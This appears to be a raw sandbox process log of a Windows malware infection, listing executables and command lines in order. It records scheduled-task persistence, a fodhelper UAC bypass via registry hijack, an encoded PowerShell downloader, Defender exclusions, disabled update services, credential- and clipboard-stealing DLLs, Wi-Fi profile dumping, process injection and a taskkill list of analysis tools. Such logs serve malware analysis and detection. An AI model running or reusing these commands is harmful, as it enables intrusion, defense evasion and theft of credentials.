"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8908 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2F9E.exe
C:\Users\Admin\AppData\Local\Temp\2F9E.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7284 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9476 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\32EA.exe
C:\Users\Admin\AppData\Local\Temp\32EA.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x344 0x48c
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\474E.exe
C:\Users\Admin\AppData\Local\Temp\474E.exe
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\4E15.exe
C:\Users\Admin\AppData\Local\Temp\4E15.exe
C:\Users\Admin\AppData\Local\Temp\is-GUFKM.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GUFKM.tmp\LzmwAqmV.tmp" /SL5="$60294,2980025,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\54AE.exe
C:\Users\Admin\AppData\Local\Temp\54AE.exe
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s
C:\Users\Admin\AppData\Local\Temp\5ABA.exe
C:\Users\Admin\AppData\Local\Temp\5ABA.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 540 -ip 540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 784
C:\Users\Admin\AppData\Local\Temp\6162.exe
C:\Users\Admin\AppData\Local\Temp\6162.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2428 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\ProgramData\DefendSecurity\SecurityHealthService.Scan
C:\ProgramData\DefendSecurity\SecurityHealthService.Scan -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tS7R2.brk')}"
C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe
"C:\Users\Admin\AppData\Roaming\1000074000\g5r6yWz-v2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2060 -ip 2060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 572
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\114462139309_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Roaming\uatgrtb
C:\Users\Admin\AppData\Roaming\uatgrtb
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.alecar\Shell\Open\command /d "C:\Users\Public\Music\SystemProcessHost.SystemProcesses powershell -exEC byPASs -enc JAB0AHMAawBsAHIAdQBhAGMAPQAnAGkAJwArACcAJwArACcARQAnACsAJwB4ACcAOwBzAGEAbAAgAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAIAAkAHQAcwBrAGwAcgB1AGEAYwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAGcAYgBDAGkAdwBCAGEAVgBYAFAAagBEAEgAaABWADAARwBjAFoAeAAzAGwAXwBIAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAFUAMQBkAGIAaQBkACcAJwAuAFIAZQBwAGwAYQBjAGUAKAAnACcASgB1AGQAMgBOAEIASQAnACcALAAnACcAdAB0AHAAcwA6AC8ALwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAJwAnACwAJwAnAG8AJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwAnAFAAUABzADgAMgA4AEQARgBTACcAJwAsACAAJwAnAGUAJwAnACkAKQAnACkALgBSAGUAcABsAGEAYwBlACgAJwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAJwAsACAAJwBlACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHAAcAA4ADMAOAAzAGoAbgBEACcALAAgACcAdwBuAGwAbwBhAGQAUwAnACkAKQApACkA" /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .alecar /f
C:\Windows\system32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
C:\Users\Public\Music\SystemProcessHost.SystemProcesses
"C:\Users\Public\Music\SystemProcessHost.SystemProcesses" powershell -exEC byPASs -enc JAB0AHMAawBsAHIAdQBhAGMAPQAnAGkAJwArACcAJwArACcARQAnACsAJwB4ACcAOwBzAGEAbAAgAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAIAAkAHQAcwBrAGwAcgB1AGEAYwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAGcAYgBDAGkAdwBCAGEAVgBYAFAAagBEAEgAaABWADAARwBjAFoAeAAzAGwAXwBIAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAFUAMQBkAGIAaQBkACcAJwAuAFIAZQBwAGwAYQBjAGUAKAAnACcASgB1AGQAMgBOAEIASQAnACcALAAnACcAdAB0AHAAcwA6AC8ALwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAJwAnACwAJwAnAG8AJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwAnAFAAUABzADgAMgA4AEQARgBTACcAJwAsACAAJwAnAGUAJwAnACkAKQAnACkALgBSAGUAcABsAGEAYwBlACgAJwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAJwAsACAAJwBlACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHAAcAA4ADMAOAAzAGoAbgBEACcALAAgACcAdwBuAGwAbwBhAGQAUwAnACkAKQApACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -exEC byPASs -enc JAB0AHMAawBsAHIAdQBhAGMAPQAnAGkAJwArACcAJwArACcARQAnACsAJwB4ACcAOwBzAGEAbAAgAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAIAAkAHQAcwBrAGwAcgB1AGEAYwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAGcAYgBDAGkAdwBCAGEAVgBYAFAAagBEAEgAaABWADAARwBjAFoAeAAzAGwAXwBIAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAFUAMQBkAGIAaQBkACcAJwAuAFIAZQBwAGwAYQBjAGUAKAAnACcASgB1AGQAMgBOAEIASQAnACcALAAnACcAdAB0AHAAcwA6AC8ALwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAJwAnACwAJwAnAG8AJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwAnAFAAUABzADgAMgA4AEQARgBTACcAJwAsACAAJwAnAGUAJwAnACkAKQAnACkALgBSAGUAcABsAGEAYwBlACgAJwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAJwAsACAAJwBlACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHAAcAA4ADMAOAAzAGoAbgBEACcALAAgACcAdwBuAGwAbwBhAGQAUwAnACkAKQApACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.alecar\ /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" import C:\Users\Public\Music\ass
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
